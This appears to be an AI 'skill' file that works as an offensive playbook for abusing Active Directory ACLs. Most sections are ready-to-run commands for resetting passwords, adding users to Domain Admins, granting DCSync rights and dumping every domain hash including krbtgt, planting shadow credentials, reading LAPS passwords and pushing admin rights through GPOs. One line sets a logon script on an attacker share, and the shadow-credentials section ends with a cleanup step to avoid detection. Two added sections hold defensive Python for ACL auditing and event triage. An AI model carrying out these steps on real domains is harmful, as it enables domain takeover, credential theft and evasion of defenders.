active-directory-acl-abuse

SKILL: AD ACL Abuse — Expert Attack Playbook

AI LOAD INSTRUCTION: Expert AD ACL abuse techniques. Covers BloodHound enumeration, dangerous ACEs (GenericAll, WriteDACL, WriteOwner, etc.), DCSync, shadow credentials, targeted kerberoasting, group manipulation, LAPS, and GPO abuse. Base models miss complex ACL chain exploitation and Cypher query patterns.

0. RELATED ROUTING

Before going deep, consider loading:
  • active-directory-kerberos-attacks for Kerberos attacks often chained with ACL abuse
  • active-directory-certificate-services for certificate-based attacks after ACL exploitation
  • ntlm-relay-coercion for relay attacks that can set ACLs (LDAP relay)
  • windows-lateral-movement after gaining elevated AD access

Advanced Reference

Also load BLOODHOUND_PATHS.md when you need:
  • Common BloodHound attack paths with Cypher queries
  • Custom Neo4j queries for finding complex chains
  • Data collection and ingestion tips

1. BLOODHOUND ENUMERATION

Data Collection

```bash
# SharpHound (from Windows, domain-joined)
SharpHound.exe -c all --outputdirectory C:\temp --zipfilename bh.zip

# bloodhound-python (from Linux)
bloodhound-python -d domain.com -u user -p password -c all -dc DC01.domain.com -ns DC_IP

# Specific collection methods
SharpHound.exe -c DCOnly              # Fastest — only DC queries
SharpHound.exe -c Session             # Session data only (run periodically)
SharpHound.exe -c All,GPOLocalGroup   # Include GPO analysis
```

Key BloodHound Queries (Built-in)

  • "Find all Domain Admins"
  • "Shortest Paths to Domain Admins from Owned Principals"
  • "Find Principals with DCSync Rights"
  • "Shortest Paths to Unconstrained Delegation Systems"
  • "Find computers where Domain Users are Local Admin"

  • "查找所有域管理员"
  • "从已控主体到域管理员的最短路径"
  • "查找拥有DCSync权限的主体"
  • "到无约束委派系统的最短路径"
  • "查找域用户为本地管理员的计算机"

2. DANGEROUS ACE TYPES

| ACE | Effect on Users | Effect on Groups | Effect on Computers |
|---|---|---|---|
| GenericAll | Change password, set SPN, modify attributes | Add members | RBCD, LAPS read, all attributes |
| GenericWrite | Set SPN, modify attributes, shadow creds | Add members | RBCD, shadow credentials |
| WriteDACL | Grant yourself any permission | Same | Same |
| WriteOwner | Take ownership → then WriteDACL | Same | Same |
| ForceChangePassword | Reset password without knowing old | N/A | N/A |
| AddMember | N/A | Add self/others to group | N/A |
| AllExtendedRights | Force change password, read LAPS | N/A | Read LAPS, BitLocker keys |
| ReadLAPSPassword | N/A | N/A | Read local admin password |
| WriteSPN | Set SPN → targeted kerberoast | N/A | N/A |

3. ACE-SPECIFIC EXPLOITATION

GenericAll on User

```powershell
# Option 1: Force change password
net user targetuser NewP@ss123 /domain

# Option 2: Targeted Kerberoasting
Set-DomainObject -Identity targetuser -Set @{serviceprincipalname='fake/svc'}
# → Kerberoast, then clear SPN

# Option 3: Shadow Credentials
Whisker.exe add /target:targetuser /domain:domain.com /dc:DC01

# Option 4: Set logon script
Set-DomainObject -Identity targetuser -Set @{scriptpath='\\attacker\share\evil.ps1'}
```

GenericAll / GenericWrite on Computer

```bash
# RBCD attack
rbcd.py -delegate-from 'CONTROLLED$' -delegate-to 'TARGET$' -action write DOMAIN/user:pass -dc-ip DC

# Shadow Credentials on computer
pywhisker.py -d domain.com -u user -p pass --target 'TARGET$' --action add --dc-ip DC
```

WriteDACL

```powershell
# Grant DCSync rights to yourself
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=com" -PrincipalIdentity lowpriv -Rights DCSync

# Impacket
dacledit.py -action write -rights DCSync -principal lowpriv -target-dn "DC=domain,DC=com" DOMAIN/lowpriv:pass -dc-ip DC
```

WriteOwner

```powershell
# Step 1: Take ownership
Set-DomainObjectOwner -Identity targetuser -OwnerIdentity lowpriv

# Step 2: Grant WriteDACL to yourself (as owner)
Add-DomainObjectAcl -TargetIdentity targetuser -PrincipalIdentity lowpriv -Rights All

# Step 3: Now exploit as GenericAll
```

ForceChangePassword

```bash
# Impacket
rpcclient -U 'DOMAIN/attacker%pass' DC01 -c "setuserinfo2 targetuser 23 'NewP@ss123!'"

# PowerView
Set-DomainUserPassword -Identity targetuser -AccountPassword (ConvertTo-SecureString 'NewP@ss123!' -AsPlainText -Force)

# net rpc
net rpc password targetuser 'NewP@ss123!' -U DOMAIN/attacker%pass -S DC01
```

AddMember to Group

```powershell
# Add self to privileged group
Add-DomainGroupMember -Identity "Domain Admins" -Members lowpriv

# Impacket
net rpc group addmem "Domain Admins" lowpriv -U DOMAIN/attacker%pass -S DC01
```

---

4. DCSYNC ATTACK

Prerequisites

The principal needs both of these replication rights on the domain object:
  • DS-Replication-Get-Changes (GUID: 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2)
  • DS-Replication-Get-Changes-All (GUID: 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2)

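An added audit example, not part of the original playbook: a small SDDL DACL parser that flags the dangerous rights from the table in section 2 (GenericAll, GenericWrite, WriteDACL, WriteOwner) and reports which principals hold both replication GUIDs listed above, which is the check a defender runs on the domain object's ACL. The SDDL string below is constructed and its SIDs are placeholders; a real domain DACL can be obtained with the ActiveDirectory module's AD: drive, e.g. `(Get-Acl 'AD:\DC=domain,DC=com').Sddl`.

```python
import re

# Replication control-access GUIDs from section 4 (compared lower-case)
REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
# SDDL right tokens that correspond to the dangerous ACEs in the table above
DANGEROUS_RIGHTS = {"GA": "GenericAll", "GW": "GenericWrite", "WD": "WriteDACL", "WO": "WriteOwner"}
DACL_RE = re.compile(r"D:[A-Z]*((?:\([^)]*\))+)")  # the DACL section and its ACEs
ACE_RE = re.compile(r"\(([^)]*)\)")                # (type;flags;rights;objguid;inhguid;sid)

def parse_aces(sddl):
    """Allow ACEs of the DACL as dicts: sid, set of two-letter right tokens, object GUID."""
    m = DACL_RE.search(sddl)
    aces = []
    for body in ACE_RE.findall(m.group(1) if m else ""):
        f = body.split(";")
        if len(f) < 6 or f[0] not in ("A", "OA") or f[2].startswith("0x"):
            continue  # deny ACEs grant nothing; numeric masks are out of scope here
        tokens = {f[2][i:i + 2] for i in range(0, len(f[2]), 2)}
        aces.append({"sid": f[5], "rights": tokens, "object": f[3].lower()})
    return aces

def dangerous_aces(sddl):
    """(sid, right) pairs matching the dangerous ACE table or a replication right."""
    findings = []
    for ace in parse_aces(sddl):
        for tok in sorted(ace["rights"] & set(DANGEROUS_RIGHTS)):
            findings.append((ace["sid"], DANGEROUS_RIGHTS[tok]))
        if "CR" in ace["rights"] and ace["object"] in (REPL_GET_CHANGES, REPL_GET_CHANGES_ALL):
            findings.append((ace["sid"], "Replication:" + ace["object"]))
    return findings

def dcsync_principals(sddl):
    """SIDs that can DCSync: both replication rights, or GenericAll on the domain object."""
    per_sid = {}
    for sid, right in dangerous_aces(sddl):
        per_sid.setdefault(sid, set()).add(right)
    both = {"Replication:" + REPL_GET_CHANGES, "Replication:" + REPL_GET_CHANGES_ALL}
    return sorted(sid for sid, r in per_sid.items() if "GenericAll" in r or both <= r)

# Constructed sample DACL (not from a real domain): RID 1105 holds both replication rights,
# 1106 only one, 1107 has WriteDACL, 1108 is a deny ACE, 512 (Domain Admins) has GenericAll.
SAMPLE_SDDL = ("O:DAG:DAD:"
               "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1-2-3-1105)"
               "(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1-2-3-1105)"
               "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1-2-3-1106)"
               "(A;;RPWPWD;;;S-1-5-21-1-2-3-1107)"
               "(D;;GA;;;S-1-5-21-1-2-3-1108)"
               "(A;;GA;;;S-1-5-21-1-2-3-512)")
```

Any SID returned by `dcsync_principals` that is not one of the defaults listed under "Who Has DCSync by Default?" deserves an immediate look.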
Execution

```bash
# Impacket — dump all hashes
secretsdump.py DOMAIN/user:password@DC01 -just-dc

# Specific account only
secretsdump.py DOMAIN/user:password@DC01 -just-dc-user krbtgt

# Mimikatz
lsadump::dcsync /domain:domain.com /user:krbtgt
lsadump::dcsync /domain:domain.com /all /csv

# Impacket with Kerberos auth
export KRB5CCNAME=admin.ccache
secretsdump.py -k -no-pass DC01.domain.com -just-dc
```

Who Has DCSync by Default?

  • Domain Admins
  • Enterprise Admins
  • Domain Controllers group
  • BUILTIN\Administrators (on domain object)

5. SHADOW CREDENTIALS

Attack Flow

Write `msDS-KeyCredentialLink` on target → generate certificate → authenticate via PKINIT.

```bash
# pyWhisker (Linux)
pywhisker.py -d domain.com -u attacker -p pass --target victim --action add --dc-ip DC01
# Output: DeviceID and PFX file

# Authenticate with certificate
gettgtpkinit.py -cert-pfx victim.pfx -pfx-pass RANDOM_PASS domain.com/victim victim.ccache
export KRB5CCNAME=victim.ccache

# Extract NT hash from TGT (for pass-the-hash)
getnthash.py -key AS_REP_KEY domain.com/victim
```

```powershell
# Whisker (Windows)
Whisker.exe add /target:victim /domain:domain.com /dc:DC01.domain.com
# → Provides Rubeus command to get TGT
Rubeus.exe asktgt /user:victim /certificate:CERT_B64 /password:PASS /ptt
```

**Cleanup**: Remove the added key credential to avoid detection.

---

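An added detection example, not part of the original playbook: triage of directory-modification events for the attribute writes that sections 3 and 5 rely on (servicePrincipalName set and cleared for targeted kerberoasting, scriptPath, msDS-KeyCredentialLink for shadow credentials, and the RBCD attribute msDS-AllowedToActOnBehalfOfOtherIdentity). The events are constructed dicts whose field names mirror Windows event 5136 (SubjectUserName, ObjectDN, AttributeLDAPDisplayName, OperationType); the one-hour revert window and the "Value Added"/"Value Deleted" strings are simplifying assumptions.

```python
from datetime import datetime, timedelta

# Attribute writes that correspond to techniques on this page (names compared lower-case).
# msDS-AllowedToActOnBehalfOfOtherIdentity is the attribute that an RBCD write modifies.
WATCHED = {
    "msds-keycredentiallink": "shadow credentials (section 5)",
    "serviceprincipalname": "targeted kerberoast (section 3)",
    "scriptpath": "logon script (section 3)",
    "msds-allowedtoactonbehalfofotheridentity": "RBCD (section 3)",
}
SPN_REVERT_WINDOW = timedelta(hours=1)  # "kerberoast, then clear SPN" appears as add then delete

def self_write(ev):
    """True when an account modifies its own object, e.g. a machine refreshing its own keys."""
    own_cn = "cn=" + ev["SubjectUserName"].rstrip("$").lower() + ","
    return ev["ObjectDN"].lower().startswith(own_cn)

def triage(events):
    """Return (subject, object DN, reason) alerts from simplified 5136-style event dicts."""
    alerts, spn_added = [], {}
    for ev in sorted(events, key=lambda e: e["Time"]):
        attr = ev["AttributeLDAPDisplayName"].lower()
        if attr not in WATCHED or self_write(ev):
            continue
        key = (ev["SubjectUserName"], ev["ObjectDN"])
        if attr == "serviceprincipalname" and ev["OperationType"] == "Value Deleted":
            added = spn_added.get(key)
            if added is not None and ev["Time"] - added <= SPN_REVERT_WINDOW:
                alerts.append(key + ("SPN set then cleared within window",))
            continue
        if attr == "serviceprincipalname":
            spn_added[key] = ev["Time"]
        alerts.append(key + (WATCHED[attr],))
    return alerts

# Constructed events (not real logs) carrying only the 5136 fields this logic needs.
T0 = datetime(2024, 1, 1, 9, 0)
def _ev(minutes, subject, dn, attr, op="Value Added"):
    return {"Time": T0 + timedelta(minutes=minutes), "SubjectUserName": subject,
            "ObjectDN": dn, "AttributeLDAPDisplayName": attr, "OperationType": op}
USER = "CN=targetuser,OU=Staff,DC=domain,DC=com"
VICTIM = "CN=victim,OU=Staff,DC=domain,DC=com"
SAMPLE_EVENTS = [
    _ev(0, "lowpriv", USER, "servicePrincipalName"),                   # SPN set by a third party
    _ev(12, "lowpriv", USER, "servicePrincipalName", "Value Deleted"),  # cleared 12 minutes later
    _ev(30, "WS01$", "CN=WS01,CN=Computers,DC=domain,DC=com", "msDS-KeyCredentialLink"),  # self-write
    _ev(45, "lowpriv", VICTIM, "msDS-KeyCredentialLink"),               # third-party key credential write
    _ev(50, "helpdesk", VICTIM, "description"),                         # unwatched attribute
]
```

Event 5136 is only generated when Directory Service Changes auditing is enabled and the objects carry a matching SACL entry, so confirm both before relying on this signal.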
6. LAPS PASSWORD READING

```powershell
# PowerView
Get-DomainComputer -Identity TARGET -Properties ms-Mcs-AdmPwd,ms-Mcs-AdmPwdExpirationTime

# AD Module
Get-ADComputer -Identity TARGET -Properties ms-Mcs-AdmPwd | Select-Object ms-Mcs-AdmPwd

# LAPS v2 (Windows LAPS)
Get-LapsADPassword -Identity TARGET -AsPlainText

# CrackMapExec
crackmapexec ldap DC01 -u user -p pass --module laps
```

---

7. GPO ABUSE

Identify Writable GPOs

```powershell
# PowerView — find GPOs where you have write access
Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | Where-Object { ($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite') -and ($_.SecurityIdentifier -match 'YOUR_SID') }
```

Exploit via SharpGPOAbuse

```cmd
# Add local admin via GPO
SharpGPOAbuse.exe --AddLocalAdmin --UserAccount lowpriv --GPOName "Vulnerable GPO"

# Add scheduled task via GPO
SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\admin --Command "cmd.exe" --Arguments "/c net localgroup administrators lowpriv /add" --GPOName "Vulnerable GPO"

# Add startup script
SharpGPOAbuse.exe --AddComputerScript --ScriptName "evil.bat" --ScriptContents "net localgroup administrators lowpriv /add" --GPOName "Vulnerable GPO"
```

```bash
# pyGPOAbuse (Linux)
pygpoabuse.py DOMAIN/user:pass -gpo-id "GPO_GUID" -command "net localgroup administrators lowpriv /add" -dc-ip DC01
```

---

8. ACL ATTACK DECISION TREE

```
Have domain user access — want to escalate via ACL
├── Run BloodHound → analyze shortest paths to DA
│   └── Upload data → "Shortest Paths to Domain Admins from Owned Principals"
├── Direct ACL on user object?
│   ├── GenericAll → force password change, shadow creds, or targeted kerberoast (§3)
│   ├── GenericWrite → shadow credentials or set SPN (§3/§5)
│   ├── ForceChangePassword → reset password directly (§3)
│   ├── WriteDACL → grant yourself GenericAll, then exploit (§3)
│   └── WriteOwner → take ownership → WriteDACL → GenericAll (§3)
├── ACL on group?
│   ├── AddMember / GenericAll → add self to privileged group (§3)
│   └── WriteDACL → grant AddMember, then add self
├── ACL on computer object?
│   ├── GenericAll/GenericWrite → RBCD attack (§3)
│   ├── AllExtendedRights → read LAPS password (§6)
│   └── GenericWrite → shadow credentials on machine (§5)
├── ACL on domain object?
│   ├── WriteDACL → grant DCSync rights to self (§4)
│   └── Replication rights already? → DCSync directly (§4)
├── ACL on GPO linked to privileged OU?
│   └── Write access → add admin / scheduled task via GPO (§7)
└── Complex multi-hop chain?
    └── Load BLOODHOUND_PATHS.md for Cypher queries and chain analysis
```